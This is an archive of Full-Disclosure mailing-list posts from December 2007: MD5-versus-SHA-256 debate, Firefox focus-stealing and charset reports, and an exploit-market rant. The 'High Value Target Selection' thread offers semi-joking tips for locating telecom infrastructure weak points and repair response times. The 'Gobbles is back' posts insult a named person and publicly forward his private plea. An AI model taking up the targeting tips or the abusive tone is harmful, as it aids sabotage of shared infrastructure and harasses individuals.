In-Reply-To: <8a6b8e350712010939g1fee081eqd7815ba53a594b25@mail.gmail.com>
References: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
	<26439.65.88.218.157.1196522453.squirrel@slashmail.org>
	<8a6b8e350712010939g1fee081eqd7815ba53a594b25@mail.gmail.com>
Message-ID: <20071201175147.GA85617@ws23.ernw.de>

because they perform risk-analysis:
- what are the threats to my assets?
- which role does MD5 play there?
- any subsequent risk then from using it?
- high priority risk? mitigating controls or risk acceptance?

would you be so kind to show me a real-world attack against a VPN using MD5 hashing? ...

thanks,

Enno




On Sat, Dec 01, 2007 at 06:39:56PM +0100, James Matthews wrote:
> I agree! It should be changed and i have no idea why people still use it!
> 
> On Dec 1, 2007 4:20 PM, Steven Adair <steven at securityzone.org> wrote:
> 
> > >
> > >
> > > There you have it.  Surely a GPL'd tool implementing this attack style
> > > will be available shortly.  And since Chinese researchers have been
> > > attacking SHA-1 lately, should SHA-256 be considered the proper
> > > replacement?  I am unsure :-(
> >
> > Yes, it would probably be a good idea.  I think this link has been put out
> > on this list in the past with respect to discussion on SHA-1:
> >
> > http://csrc.nist.gov/groups/ST/toolkit/secure_hashing.html
> >
> > NIST might not be the bible to you on what to follow and implement, but
> > they are definitely worth listening to (even if you're not a U.S. Federal
> > agency) when they tell you not to use something anymore.  For those that
> > don't want to click and just want to read, here's the relevant parts:
> >
> > ----
> >
> > March 15, 2006: The SHA-2 family of hash functions (i.e., SHA-224,
> > SHA-256, SHA-384 and SHA-512) may be used by Federal agencies for all
> > applications using secure hash algorithms. Federal agencies should stop
> > using SHA-1 for digital signatures, digital time stamping and other
> > applications that require collision resistance as soon as practical, and
> > must use the SHA-2 family of hash functions for these applications after
> > 2010. After 2010, Federal agencies may use SHA-1 only for the following
> > applications: hash-based message authentication codes (HMACs); key
> > derivation functions (KDFs); and random number generators (RNGs).
> > Regardless of use, NIST encourages application and protocol designers to
> > use the SHA-2 family of hash functions for all new applications and
> > protocols.
> >
> > ----
> >
> > Steven
> > http://www.securityzone.org
> >
> > > --
> > > Kristian Erik Hermansen
> > > "I have no special talent. I am only passionately curious."
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> 
> 
> 
> -- 
> http://search.goldwatches.com/?Search=Movado+Watches
> http://www.jewelerslounge.com
> http://www.goldwatches.com

> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 
Enno Rey

ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5  444E C611 033E 3296 1CC1

Handelsregister Heidelberg: HRB 7135
Geschaeftsfuehrer: Roland Fiege, Enno Rey



From tim-security at sentinelchicken.org  Sat Dec  1 19:20:21 2007
From: tim-security at sentinelchicken.org (Tim)
Date: Sat, 1 Dec 2007 14:20:21 -0500
Subject: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
In-Reply-To: <20071201175147.GA85617@ws23.ernw.de>
References: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
	<26439.65.88.218.157.1196522453.squirrel@slashmail.org>
	<8a6b8e350712010939g1fee081eqd7815ba53a594b25@mail.gmail.com>
	<20071201175147.GA85617@ws23.ernw.de>
Message-ID: <20071201192020.GD2079@sentinelchicken.org>

> because they perform risk-analysis:
> - what are the threats to my assets?
> - which role does MD5 play there?
> - any subsequent risk then from using it?
> - high priority risk? mitigating controls or risk acceptance?

Don't kid yourself.  Very few businesses in my experience think about
this stuff when they go to use a hash.  Most just use whatever hash
they're used to using.  I rarely see clients actually sitting down and
thinking about what the application of a given hash is and what the
threats are in their specific case. 


> would you be so kind to show me a real-world attack against a VPN
> using MD5 hashing? ...

Assuming there are no real-world attacks against your particular VPN
that uses MD5, does that make it safe for the rest of us in any given
application?  A rather leading question IMO.

tim



From staticrez at gmail.com  Sat Dec  1 20:00:22 2007
From: staticrez at gmail.com (Static Rez)
Date: Sat, 1 Dec 2007 15:00:22 -0500
Subject: [Full-disclosure] Firefox 2.0.0.11 File Focus Stealing
	vulnerability
In-Reply-To: <997ef2c20712010937q1cc66354w78ac71761b31f1a0@mail.gmail.com>
References: <1200694.87911196522696390.JavaMail.juha-matti.laurio@netti.fi>
	<997ef2c20712010937q1cc66354w78ac71761b31f1a0@mail.gmail.com>
Message-ID: <5d80962a0712011200m280cfceblbf0bec30a86d0b56@mail.gmail.com>

Doesn't work in Gran Paradiso 3.0a7

On Dec 1, 2007 12:37 PM, Nate McFeters <nate.mcfeters at gmail.com> wrote:

>
> More than likely all the gecko based browsers will be vulnerable to this.
> So that would include Mozilla, Camino, SeaMonkey... possibly even things
> like Thunderbird if you could get it to render.
>
> Nice find guys!
>
> Nate
>
> On 12/1/07, Juha-Matti Laurio <juha-matti.laurio at netti.fi> wrote:
> >
> > Netscape Navigator version 9.0.0.4 is affected too. Test done with
> > PoC-type URL mentioned on Mac OS X 10.4.10 fully patched.
> > Vendor was contacted on 1st Dec 2007.
> >
> > - Juha-Matti
> >
> > carl hardwick <hardwick.carl at gmail.com> wrote:
> > > Firefox 2.0.0.11 File Focus Stealing vulnerability:
> > >
> > > Sorry Mozilla, but the recent file focus fix was not enough. I think
> > > Mozilla made another mistake while fixing the previous file/label
> > > issue. Because now I embed a file field and a textfield inside one
> > > label. When this happens, and you type only one time in the textfield,
> > > the focus travels to the file field and the value travels with it.
> > > Back to the drawing board I would say. I only got it to work in
> > > Firefox, Gareth checked Safari for me, and it also works in Safari. I
> > > guess this type of exploit could function on other HTML objects as
> > > well, and could be very dangerous because it only requires a one time
> > > focus in a textfield.
> > >
> > > PoC here:
> > >
> > http://carl-hardwick.googlegroups.com/web/Firefox20011StealFocusFlaw.htm
> > >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071201/98603232/attachment.html 

From psz at maths.usyd.edu.au  Sat Dec  1 20:30:47 2007
From: psz at maths.usyd.edu.au (Paul Szabo)
Date: Sun, 2 Dec 2007 07:30:47 +1100
Subject: [Full-disclosure] Firefox explicit charset inheritance
Message-ID: <200712012030.lB1KUlFo013154@asti.maths.usyd.edu.au>

I found that Firefox 2.0.0.10 will inherit the charset of the parent
page, when that had been selected manually (does not inherit the charset
specified in headers or meta). I found this inheritance to work both
with [a href] links and [iframe src] in the parent page.

See also:
http://www.mozilla.org/security/announce/2007/mfsa2007-02.html
https://bugzilla.mozilla.org/show_bug.cgi?id=356280

Cheers,

Paul Szabo   psz at maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



From pauls at utdallas.edu  Sat Dec  1 21:21:02 2007
From: pauls at utdallas.edu (Paul Schmehl)
Date: Sat, 01 Dec 2007 15:21:02 -0600
Subject: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
In-Reply-To: <20071201192020.GD2079@sentinelchicken.org>
References: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
	<26439.65.88.218.157.1196522453.squirrel@slashmail.org>
	<8a6b8e350712010939g1fee081eqd7815ba53a594b25@mail.gmail.com>
	<20071201175147.GA85617@ws23.ernw.de>
	<20071201192020.GD2079@sentinelchicken.org>
Message-ID: <5A6842764BDB4DDFF2D38F4A@paul-schmehls-powerbook59.local>

--On December 1, 2007 2:20:21 PM -0500 Tim 
<tim-security at sentinelchicken.org> wrote:

>> because they perform risk-analysis:
>> - what are the threats to my assets?
>> - which role does MD5 play there?
>> - any subsequent risk then from using it?
>> - high priority risk? mitigating controls or risk acceptance?
>
> Don't kid yourself.  Very few businesses in my experience think about
> this stuff when they go to use a hash.  Most just use whatever hash
> they're used to using.  I rarely see clients actually sitting down and
> thinking about what the application of a given hash is and what the
> threats are in their specific case.
>
>
>> would you be so kind to show me a real-world attack against a VPN
>> using MD5 hashing? ...
>
> Assuming there are no real-world attacks against your particular VPN
> that uses MD5, does that make it safe for the rest of us in any given
> application?  A rather leading question IMO.
>
While I don't think it's time to panic, it's definitely time to begin 
moving to SHA-256 and stop using MD-5.  FreeBSD has already done so in its 
ports system, although you can still use MD-5 as well.  But far too many 
downloads still use MD-5 or **no checksum at all**, and that is a problem.

While collisions in MD-5 are now proven, what I've not seen yet is the 
ability to alter a legitimate file or tarball yet generate the same 
checksum.  It *is* theoretically possible, however, and the fact that 
collisions have been proven should be enough to begin abandoning its use 
IMO.

Paul Schmehl (pauls at utdallas.edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/



From isbackgobbles at googlemail.com  Sat Dec  1 21:24:23 2007
From: isbackgobbles at googlemail.com (Gobbles is back)
Date: Sat, 1 Dec 2007 21:24:23 +0000
Subject: [Full-disclosure] Phioust is now getting really emotional ...
Message-ID: <679de8620712011324x6d5733c8j2f128200b887dcb2@mail.gmail.com>

Phioust, we love you .. google your name for the christmas gift !!!

---------- Forwarded message ----------
From: phioust <phioust at gmail.com>
Date: Dec 1, 2007 2:33 PM
Subject: Re: spam?
To: Gobbles is back <isbackgobbles at googlemail.com>

Why are you doing this ? i dont even know you. i would appriciate if you
really stop doing this. incase i have offended anyone of you in the past in
any way , i did not mean to .. Infact i think its quite cool what you guys
are doing to matasano .. so please stop this .. its a honest request, sorry.



 On Dec 1, 2007 4:32 AM, Gobbles is back < isbackgobbles at googlemail.com>
wrote:

> You lil fucking idiot !!! now this mail of yours will be on Full D too,
> sadly with your dumb turky name and those useless degrees ... lol
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071201/c9f66a1b/attachment.html 

From isbackgobbles at googlemail.com  Sat Dec  1 22:09:36 2007
From: isbackgobbles at googlemail.com (Gobbles is back)
Date: Sat, 1 Dec 2007 22:09:36 +0000
Subject: [Full-disclosure] Phioust is now getting really emotional ...
In-Reply-To: <679de8620712011324x6d5733c8j2f128200b887dcb2@mail.gmail.com>
References: <679de8620712011324x6d5733c8j2f128200b887dcb2@mail.gmail.com>
Message-ID: <679de8620712011409n4bdf20f3u61b3b106bbe508c4@mail.gmail.com>

Phioust, we love you .. google your name for the christmas gift !!!

---------- Forwarded message ----------
From: phioust < phioust at gmail.com>
Date: Dec 1, 2007 2:33 PM
Subject: Re: spam?
To: Gobbles is back <isbackgobbles at googlemail.com>

why are you doing this ? i dont even know you. i would appreciate if you
really stop doing this. incase i have offended anyone of you in the past in
any way , i did not mean to. infact i think its quite cool what you guys are
doing to matasano. so please stop this, its a honest request, sorry.


 On Dec 1, 2007 4:32 AM, Gobbles is back < isbackgobbles at googlemail.com>
wrote:

> You lil idiot !!! now this mail of yours will be on Full D too, sadly with
> your dumb turkey name and those useless degrees ... lol
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071201/902b4d56/attachment.html 

From randallm at fidmail.com  Sat Dec  1 22:57:11 2007
From: randallm at fidmail.com (Randy Mueller)
Date: Sat, 01 Dec 2007 16:57:11 -0600
Subject: [Full-disclosure] Full-Disclosure Digest, Vol 34, Issue 1
In-Reply-To: <mailman.1.1196510401.14230.full-disclosure@lists.grok.org.uk>
References: <mailman.1.1196510401.14230.full-disclosure@lists.grok.org.uk>
Message-ID: <4751E6C7.5070604@fidmail.com>


> ------------------------------
>
> Message: 6
> Date: Fri, 30 Nov 2007 23:44:07 +0100
> From: "Max Moser" <max.moser at gmail.com>
> Subject: [Full-disclosure] 27Mhz based wireless security insecurities
> 	- Aka	- "We know what you typed last summer"
> To: full-disclosure at lists.netsys.com, full-disclosure at netsys.com,
> 	"Full Disclosure" <full-disclosure at lists.grok.org.uk>
> Message-ID:
> 	<cb3f57650711301444j15cc7ecu53e55da399c8e80d at mail.gmail.com>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Dear List members,
>
> Today the team remote-exploit.org together with Dreamlab Technologies likes
> to release another piece of uniq research work.
>
> [snip}
> Max Moser & Philipp Schroedel
> Dreamlab Technologies AG / Team remote-exploit.org
>
>
>
> ------------------------------
>   

1. Thought is was great
2. Thought it was funny I had to "Allow" remote-exploit.org on Firefox 
Noscript!
3. Anyway you can share that software??!!!



From coderman at gmail.com  Sat Dec  1 23:09:32 2007
From: coderman at gmail.com (coderman)
Date: Sat, 1 Dec 2007 15:09:32 -0800
Subject: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
In-Reply-To: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
References: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
Message-ID: <4ef5fec60712011509qc21ddb9x769de40b1544b34a@mail.gmail.com>

On Dec 1, 2007 5:06 AM, Kristian Erik Hermansen
<kristian.hermansen at gmail.com> wrote:
> [MD5 is dead like WEP]

yup.


> And since Chinese researchers have been
> attacking SHA-1 lately, should SHA-256 be considered the proper
> replacement?

SHA2 is good.  (so 256 or 512).  the design differs from SHA1 and
avoids the weaknesses being exploited against this hash func.

still, ~2^69 collision resistance for SHA1 is a world of security
better than MD5.  iMD5 is really dead, lingering only to feast on the
brains of the unawares...



From coderman at gmail.com  Sat Dec  1 23:36:36 2007
From: coderman at gmail.com (coderman)
Date: Sat, 1 Dec 2007 15:36:36 -0800
Subject: [Full-disclosure] High Value Target Selection
In-Reply-To: <47518753.9030006@rogers.com>
References: <47505E42.90503@rogers.com>
	<4ef5fec60711302127i3e7baef0vf055d8a6592a5ee7@mail.gmail.com>
	<47518753.9030006@rogers.com>
Message-ID: <4ef5fec60712011536t79f77c51x918090aae280405c@mail.gmail.com>

On Dec 1, 2007 8:09 AM, gmaggro <gmaggro at rogers.com> wrote:
> ...
> Why not advocate? If you did get in trouble for this post, I don't think
> adding a caveat like "of course not advocation" would help you much, if
> at all. Like those quips in Phrack or Paladin Press books "For
> educational purposes only". Bwahahaha!

Paladin Press, now you're taking me back...  ah, the days.

not advocating because as funny as some dude in jeans and a t-shirt
firing up a thermal lance would seem, in the end the darwin awards
need no assistance.

also, i don't want them cloggin' ma tubes!  jeez mang.


> Really, how much trouble could we get in if we posted up a list of
> street addresses, each address being a building that contained
> significant telco and/or routing infrastructure?

try it, it's amusing.  remember the all the photogs getting hassled by the
man for merely taking pictures of bridges and plants and such?

if you're actually effective at amassing a good database of infrastructure
information you'll get the attention you so desperately crave; i promise!

:P~


> Probably be some interesting/useful information poking around BGP land
> and looking at ASs and their relationships in more detail. Especially
> when cross-referenced to actual physical locations.

not really, focus on the physical transport.  the MPLS/IP layers just confirm
what you should have suspected all along: apparent diversity at the routing
layer is sharing way too much of the same physical transport.

(in telco land, one SONET span over aerial transport and the other buried
plant is considered sufficient "path diversity/redundancy".  never mind that
the same right of way is used...)


> http://xkcd.com/195/

xkcd is highly recommended.   in particular, a Shibboleth to sift the
pyro-anarcho-dimwits from those who recognize more effective means
at expressing and redressing grievances against their government.

one last hint: news feeds are a great way to discern details about critical
infrastructure and response times for repair.  don't forget to set your
google news alerts...



From juha-matti.laurio at netti.fi  Sun Dec  2 00:13:51 2007
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Sun, 2 Dec 2007 02:13:51 +0200 (EET)
Subject: [Full-disclosure] Firefox 2.0.0.11 File Focus Stealing
 vulnerability
Message-ID: <23227044.113251196554431449.JavaMail.juha-matti.laurio@netti.fi>

N/A unfortunately, but BID26669 points to entries
https://bugzilla.mozilla.org/show_bug.cgi?id=258875
and
https://bugzilla.mozilla.org/show_bug.cgi?id=56236

via this older one advisory: http://www.securityfocus.com/bid/18308/references

Link: http://www.securityfocus.com/bid/26669/discuss

(Probably BID18038 mentioned is a typo...)

- Juha-Matti


"Randal, Phil" <prandal at herefordshire.gov.uk> kirjoitti: 
> 
>  And the Mozilla bugzilla number is?
> 
> 
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of
> Juha-Matti Laurio
> Sent: 01 December 2007 15:25
> To: carl hardwick; full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] Firefox 2.0.0.11 File Focus Stealing
> vulnerability
> 
> Netscape Navigator version 9.0.0.4 is affected too. Test done with
> PoC-type URL mentioned on Mac OS X 10.4.10 fully patched.
> Vendor was contacted on 1st Dec 2007.
> 
> - Juha-Matti
> 
> carl hardwick <hardwick.carl at gmail.com> wrote: 
> > Firefox 2.0.0.11 File Focus Stealing vulnerability:
> > 
> > Sorry Mozilla, but the recent file focus fix was not enough. I think 
> > Mozilla made another mistake while fixing the previous file/label 
> > issue. Because now I embed a file field and a textfield inside one 
> > label. When this happens, and you type only one time in the textfield,
> 
> > the focus travels to the file field and the value travels with it.
> > Back to the drawing board I would say. I only got it to work in 
> > Firefox, Gareth checked Safari for me, and it also works in Safari. I 
> > guess this type of exploit could function on other HTML objects as 
> > well, and could be very dangerous because it only requires a one time 
> > focus in a textfield.
> > 
> > PoC here:
> > http://carl-hardwick.googlegroups.com/web/Firefox20011StealFocusFlaw.h
> > tm
> > 




From Valdis.Kletnieks at vt.edu  Sun Dec  2 03:08:38 2007
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sat, 01 Dec 2007 22:08:38 -0500
Subject: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
In-Reply-To: Your message of "Sat, 01 Dec 2007 05:06:36 PST."
	<fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
References: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
Message-ID: <21403.1196564918@turing-police.cc.vt.edu>

On Sat, 01 Dec 2007 05:06:36 PST, Kristian Erik Hermansen said:
> I know of many commercial security products which still utilize MD5 to
> prove integrity of the data they distribute to customers.  This should
> no longer be considered appropriate.  Now that tools are readily
> available to exploit newer MD5 collision research, I think it is safe
> to say that the public should retire its usage for good.

Admittedly, MD5 is on its last legs.  However, please note that the current
state of the art for MD5 collisions is "create two plaintexts that collide
with the same (but unpredictable) MD5 hash".  That's what these binaries
demonstrate.

What is still *not* known to be doable is "given a plaintext that has a
pre-specified MD5 hash, compute a second plaintext with the same hash".
So publishing the MD5 hash of the binary is still safe - for now.

If I was a vendor, I'd be publishing both MD5 and SHA-256 for the data.

(Note that strictly speaking, what you *really* want is a PGP-signed or
otherwise authenticated MD5/SHA-256 hash.  Otherwise, if I'm an attacker,
I can just splat a new binary up, and a new MD5SUMS file that lists the
MD5 sum for the backdoored binaries.  If anything, more people manage to
screw *this* part up than the much lesser offense of still using MD5 rather
than something from the SHA-2 family)....
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071201/19ce617b/attachment.bin 

From kristian.hermansen at gmail.com  Sun Dec  2 03:31:53 2007
From: kristian.hermansen at gmail.com (Kristian Erik Hermansen)
Date: Sat, 1 Dec 2007 19:31:53 -0800
Subject: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
In-Reply-To: <21403.1196564918@turing-police.cc.vt.edu>
References: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
	<21403.1196564918@turing-police.cc.vt.edu>
Message-ID: <fe37588d0712011931m6d2a5930i3302cfd4441e5ace@mail.gmail.com>

On Dec 1, 2007 7:08 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> Admittedly, MD5 is on its last legs.  However, please note that the current
> state of the art for MD5 collisions is "create two plaintexts that collide
> with the same (but unpredictable) MD5 hash".  That's what these binaries
> demonstrate.

Correct...

> What is still *not* known to be doable is "given a plaintext that has a
> pre-specified MD5 hash, compute a second plaintext with the same hash".
> So publishing the MD5 hash of the binary is still safe - for now.

But is it?  Let's create a thought experiment.  Let us first assume
that an internal security product release engineer has access to the
source code, the product binaries, and is responsible for creating ISO
images and MD5 hashes to accompany them for distribution to government
agencies which will utilize the security product internally.

OK, now let's say that this release engineer wants to create two
different ISO images, each with a different AUTORUN feature on the
disc.  Since he has the ability to choose the hash here, then we must
therefore conclude that MD5 will not actually ensure that the disc is
legitimate and unaltered.  Now, such an attack is not as sexy as
colliding with a pre-formed MD5 hash, but we do know that
approximately 70% of exploited security issues somehow involve
internal personnel.

> If I was a vendor, I'd be publishing both MD5 and SHA-256 for the data.

So my question to you then is why even bother with MD5, and not just
choose to use SHA-256 instead?  In fact, I might even go so far to say
that future Linux distributions should stop including the md5sum
program in default installations.  I say this because it correlates
with the "secure by default" motto.  If the user really needs md5sum,
they can install it separately.  The only issue is that both
applications are included in coreutils, so it is unlikely that they
would ever be separated.

> (Note that strictly speaking, what you *really* want is a PGP-signed or
> otherwise authenticated MD5/SHA-256 hash.  Otherwise, if I'm an attacker,
> I can just splat a new binary up, and a new MD5SUMS file that lists the
> MD5 sum for the backdoored binaries.  If anything, more people manage to
> screw *this* part up than the much lesser offense of still using MD5 rather
> than something from the SHA-2 family)....

Yeah, storing your MD5 and binary on the same asset is just like
keeping your important security logs on a system that was just
compromised.  Your data is tainted...
-- 
Kristian Erik Hermansen
"I have no special talent. I am only passionately curious."



From gmaggro at rogers.com  Sun Dec  2 04:13:31 2007
From: gmaggro at rogers.com (gmaggro)
Date: Sat, 01 Dec 2007 23:13:31 -0500
Subject: [Full-disclosure] High Value Target Selection
In-Reply-To: <4ef5fec60712011536t79f77c51x918090aae280405c@mail.gmail.com>
References: <47505E42.90503@rogers.com>	<4ef5fec60711302127i3e7baef0vf055d8a6592a5ee7@mail.gmail.com>	<47518753.9030006@rogers.com>
	<4ef5fec60712011536t79f77c51x918090aae280405c@mail.gmail.com>
Message-ID: <475230EB.2030404@rogers.com>

> (in telco land, one SONET span over aerial transport and the other buried
> plant is considered sufficient "path diversity/redundancy".  never mind that
> the same right of way is used...)

Ah yes, I remember an old story not too dissimilar... multiple redundant
lines, all severed at the same time with the same backhoe. Idiots.

Anyone dig really deeply into that Maltego/Evolution program From
Paterva (http://www.paterva.com/web/Maltego/index.html)? It looks
interesting. HD Moore references it in that 'Tactical Exploitation' PDF
(http://milw0rm.com/papers/172) which is itself a good primer for
novitiates.



From paul.goebbels at freemail.hu  Sun Dec  2 05:12:54 2007
From: paul.goebbels at freemail.hu (Goebbels Amadeus)
Date: Sun, 2 Dec 2007 06:12:54 +0100 (CET)
Subject: [Full-disclosure] Hell Camp: A Terrifying Story of Lies and
	Middle-Men
Message-ID: <freemail.20071102061254.37689@fm02.freemail.hu>

Despite the misleading subject of my e-mail, I want to
bring to attention an important topic which hasn't been
discussed enough among the security industry: the exploit
and vulnerability research market.

Since this might be a vastly secretive community, I will
introduce
some of the members of this dramatically disturbing tale:

Since a few years ago, few companies emerged, who offer
rewards for exploit information and vulnerability research.
In the beginning, only iDefense (US-based) openly disclosed
its activities.

In the last 3-7 years we have seen ZDI (TippingPoint, now
3Com and soon its Chinese major shareholder..), WSLabi (the
failed attempt on creating an auction market model for these
sales) and Netragard (the old DMCA publicity stunt SNOsoft).

Now I'll start telling a tale of distrust, lies, middle men
and other creatures of the infraworld...

Once upon a time, there was an increasingly powerful work
force capable of crafting weapons which existed only in a
digital world. This force didn't have a name. They didn't
pursue certifications. They were anonymous. But some realized
they also had the power of influencing people, controlling the
flow of information from anywhere at any time. Humanity has
seen for ages how the power of controlling information can
take down whole nations. Nowadays, in an open and free market,
the corporate world is nothing but a battlefield.

There's no crimson tie. No blood escaping the bodies of its
soldiers. The soldiers are John Does, fighting for a decent
paycheck at any cost, selling out their spirits and time for
the corporate machine. Selling out their comrades and dignity.
Losing the values, principles and matter that make them human.
Unknowingly, they are becoming mere tools of few individuals
who have a neverending desire for fame and wealth.

Have you ever considered your future in their hands? You've
been working for 50 years, your liver and kidneys start failing,
creating visible symptoms, stains in your skin. You can't handle
life in the same way anymore. For what? What have you done in
those 50 years but serving another man to become more wealthy
and over powered. The approaching day of your death and its
mere vision strikes you like a burning iron blade.

In this New Age battlefield, you can make a difference. A
talented youth started emerging and dedicated passionately to
fulfill its curiosity. Day after day, spending countless hours
in front of a machine. Understanding it's inner design and
details, breaking it apart and reassembling it the way it wasn't
meant to be assembled.

Some others dedicated painful discipline to physical work and
trained themselves for achieving perfection in both intellectual
and physical matters. Others fell in the way and never made it
to the final round.

After realizing they could not let the corporate world exhaust
them, they tried another way. The emerging market of digital
ammunition seemed to be a potential solution for their problems.
But, unbeknown to them, they were wrong. They didn't think at
first glance of the impossibly huge amounts of lies and fallacies
they were about experience. Because in a world where you can
claim something while denying your obligation to prove it, the
only power that is left is that of common sense and intuition.
The ability to sense the deceitful and know the truthful.

Once day, our John Doe decided to approach an independent digital
weapons dealer, looking for better offers than those coming from
more established business men. He knew that more then business men,
they were only middle men. After numerous experiences with these
little twerps, he realized they were also abusing their condition.

John was also especially disappointed with the fact that in the
world of digital ammunitions, there's no real way of providing the
goods without turning them instantly useless and vulnerable to abuse.
John knew that these middle men were taking cuts far higher than
their alleged 10 to 15 percent of the sale. How could John prove it
otherwise? There was no way of ensuring that their contacts were
getting the very exact figure John demanded.

Despite this fact, John also realized that in this market of smoke,
the seller is not supposed to set the price of the goods. These
middle men, in their great mistake of thinking that wisdom and
knowledge are the very same thing, wanted John to believe that
they were the ones who set the price of the goods.

John's disappointment was growing to incredibly high stakes: "As a
child, whenever I tried to tell the candy shop clerk that the
chocolate bars cost as much as the peanut butter ones, he simply
tried to smack my head down. I wasn't supposed to even swap the
labels in a failed attempt to fool this man, who had been making
candy bars for more time than I was actually able to barely say
my name."

John had been crafting digital weapons for so many time, with
such a high talent and effectiveness, that he was much less
dispensable than this middle men. His personal background, of an
extremely tough childhood full of misery and hostility, also
gave him the necessary wisdom and experience in this world for
quickly spotting the weaknesses of these ego-crazed men. Their
weakness lies in the fact that without John and his comrades,
they have no business. They lack far more than just knowledge.
They lack wisdom, passion and truly devoted dedication to whatever
they do. Sooner or later they will make the same mistake of other
weapon dealers: getting killed with their own goods.

Hypocrisy among these poorly educated middle-men was so high,
that they resorted to low tricks and ridiculous attempts to gain
the trust of people like John. They went as far as insulting the
intelligence of those who provided them with the goods they are
unable to produce themselves. No matter how hard the tried, it
never brought anything back but silence. The silence that can be
clearly understood as a fully precise signal of genuine despise.

The fundamental error behind their approach is that trust can't
be gained for cheering, boosting the ego, claiming great benefits
and wealth. Trust is something sculpted in hard rock, taking years
to become an admirable master piece. It doesn't come attached to
an email.

At the end, John and his comrades found out that wasting their
time with these miserable beings was far less than fruitful. It
was exhausting them as much as the corporate world did. They
realized that any day above ground is a good day. Let the snakes
change their skin and show their true colors. In the desert,
being unable to match with environment has deadly consequences.
It might take years, or decades, but time will set them all where
they belong. Life does not forgive and everything has come to an
end... because they lack of patience, the end will approach their
nefarious activities sooner than they ever thought and John and
his comrades will be free again.

And this tale has to come to an end itself... the end of a
story about middle-men and their madness.

Time's striking force.

- Paul Amadeus Goebbels

Lemondta, de m?g nem k?t?tt ?jat? Vil?gbajnok ?rainkkal k?ss?n OLCS?BB K?TELEZ?T!
________________________________________________________
http://www.biztositas.hu/origo_aloldal/okgfb_rovat



From Valdis.Kletnieks at vt.edu  Sun Dec  2 05:24:17 2007
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sun, 02 Dec 2007 00:24:17 -0500
Subject: [Full-disclosure] High Value Target Selection
In-Reply-To: Your message of "Sat, 01 Dec 2007 23:13:31 EST."
	<475230EB.2030404@rogers.com>
References: <47505E42.90503@rogers.com>
	<4ef5fec60711302127i3e7baef0vf055d8a6592a5ee7@mail.gmail.com>
	<47518753.9030006@rogers.com>
	<4ef5fec60712011536t79f77c51x918090aae280405c@mail.gmail.com>
	<475230EB.2030404@rogers.com>
Message-ID: <28972.1196573057@turing-police.cc.vt.edu>

On Sat, 01 Dec 2007 23:13:31 EST, gmaggro said:
> Ah yes, I remember an old story not too dissimilar... multiple redundant
> lines, all severed at the same time with the same backhoe. Idiots.

To be fair, it's often not "idiots".  First, you have to find 2 providers
that can get fiber from point A to point B at all (note that if one or the
other doesn't already have dark fiber laid, they're either digging a ditch
or they're going to lease some fiber from a 3rd party). Then you often need
to do NDA's with both to find out where their fibers are and verify that
they in fact are diverse.  And then you need to make sure they *stay* diverse.

The following happens a *LOT*:

1) You get Vendor A to give you 4 pairs of fiber that run south on B Avenue,
east on 3rd street, south on D ave, east on 5th st, and then south on E Av.

Vendor B's runs south on C avenue, east on 6th street, then south on F Av.

Except for a few crossovers, they're diverse.

2) Vendor B has to re-groom because of a construction project at C Av & 5th st.
So they re-route to another conduit (not A's) that runs east on 3rd st to F av.

3) Bozo with a backhoe on a water main break nails both conduits on 3rd
street between C Ave and D Ave.

What are your chances of getting vendor A to re-groom your paths off 3rd St
while B has their path going down that street, and then put them back once
B goes back the other way after the construction at C and 5th is done?

Note that sometimes, there really *isn't* a good way to get diversity - how many
ways are there to get an east-west long-haul fiber across the Mississippi
